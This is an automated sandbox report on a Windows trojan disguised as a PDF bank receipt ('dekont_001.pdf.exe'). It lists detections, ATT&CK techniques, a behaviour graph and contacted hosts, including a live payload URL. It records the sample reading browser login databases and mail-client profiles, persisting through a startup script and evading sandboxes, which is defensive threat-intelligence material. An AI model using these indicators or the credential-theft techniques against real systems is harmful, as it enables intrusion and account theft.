              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4215341701.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4215341701.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              Valid Accounts1
              Scheduled Task/Job
              111
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services11
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              11
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              121
              Obfuscated Files or Information
              Security Account Manager21
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder
              2
              Registry Run Keys / Startup Folder
              2
              Software Packing
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544052 Sample: dekont_001.pdf.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 checkip.dyndns.org 2->32 34 2 other IPs or domains 2->34 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 58 14 other signatures 2->58 8 dekont_001.pdf.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 30->56 process4 dnsIp5 36 erkasera.com 188.132.193.46, 443, 49730, 49746 PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR Turkey 8->36 24 C:\Users\user\...\RequiredContract.exe, PE32 8->24 dropped 26 C:\...\RequiredContract.exe:Zone.Identifier, ASCII 8->26 dropped 28 C:\Users\user\...\RequiredContract.vbs, ASCII 8->28 dropped 64 Drops VBS files to the startup folder 8->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->66 15 InstallUtil.exe 14 2 8->15         started        68 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->68 19 RequiredContract.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 38 reallyfreegeoip.org 188.114.97.3, 443, 49732, 49733 CLOUDFLARENETUS European Union 15->38 40 checkip.dyndns.com 132.226.247.73, 49731, 49734, 49736 UTMEMUS United States 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Antivirus detection for dropped file 19->44 46 Multi AV Scanner detection for dropped file 19->46 48 Machine Learning detection for dropped file 19->48 21 InstallUtil.exe 2 19->21         started        signatures10 process11 signatures12 60 Tries to steal Mail credentials (via file / registry access) 21->60 62 Tries to harvest and steal browser information (history, passwords, etc) 21->62

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              dekont_001.pdf.exe39%ReversingLabsWin32.Trojan.Generic
              dekont_001.pdf.exe100%AviraHEUR/AGEN.1309900
              dekont_001.pdf.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\RequiredContract.exe100%AviraHEUR/AGEN.1309900
              C:\Users\user\AppData\Roaming\RequiredContract.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\RequiredContract.exe37%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org/0%URL Reputationsafe
              https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
              https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
              https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              http://reallyfreegeoip.org0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              http://checkip.dyndns.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              erkasera.com
              188.132.193.46
              truefalse
                unknown
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  checkip.dyndns.com
                  132.226.247.73
                  truefalse
                    unknown
                    checkip.dyndns.org
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                      • URL Reputation: safe
                      unknown
                      https://erkasera.com/ruurew/Ktanfonto.vdffalse
                        unknown
                        https://reallyfreegeoip.org/xml/155.94.241.188false
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://erkasera.comdekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://github.com/mgravell/protobuf-netidekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpfalse
                              unknown
                              https://stackoverflow.com/q/14436606/23354dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://github.com/mgravell/protobuf-netJdekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                unknown
                                https://stackoverflow.com/q/11564914/23354;dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://stackoverflow.com/q/2152978/23354dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://checkip.dyndns.org/qdekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://github.com/mgravell/protobuf-netdekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  unknown
                                  https://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.orgInstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003019000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.comInstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/155.94.241.188$InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://reallyfreegeoip.org/xml/dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    188.132.193.46
                                    erkasera.comTurkey
                                    42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRfalse
                                    188.114.97.3
                                    reallyfreegeoip.orgEuropean Union
                                    13335CLOUDFLARENETUStrue
                                    132.226.247.73
                                    checkip.dyndns.comUnited States
                                    16989UTMEMUSfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1544052
                                    Start date and time:2024-10-28 19:03:08 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 35s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:dekont_001.pdf.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                    EGA Information:
                                    • Successful, ratio: 25%
                                    HCA Information:
                                    • Successful, ratio: 95%
                                    • Number of executed functions: 345
                                    • Number of non-executed functions: 53
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target InstallUtil.exe, PID 8028 because it is empty
                                    • Execution Graph export aborted for target RequiredContract.exe, PID 7844 because it is empty
                                    • Execution Graph export aborted for target dekont_001.pdf.exe, PID 7304 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: dekont_001.pdf.exe
                                    TimeTypeDescription
                                    14:04:05API Interceptor70x Sleep call for process: dekont_001.pdf.exe modified
                                    14:04:17API Interceptor14429746x Sleep call for process: InstallUtil.exe modified
                                    14:04:24API Interceptor64x Sleep call for process: RequiredContract.exe modified
                                    18:04:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    188.132.193.46dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                      PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                        Contact Form and Delivery Details.png.lnkGet hashmaliciousUnknownBrowse
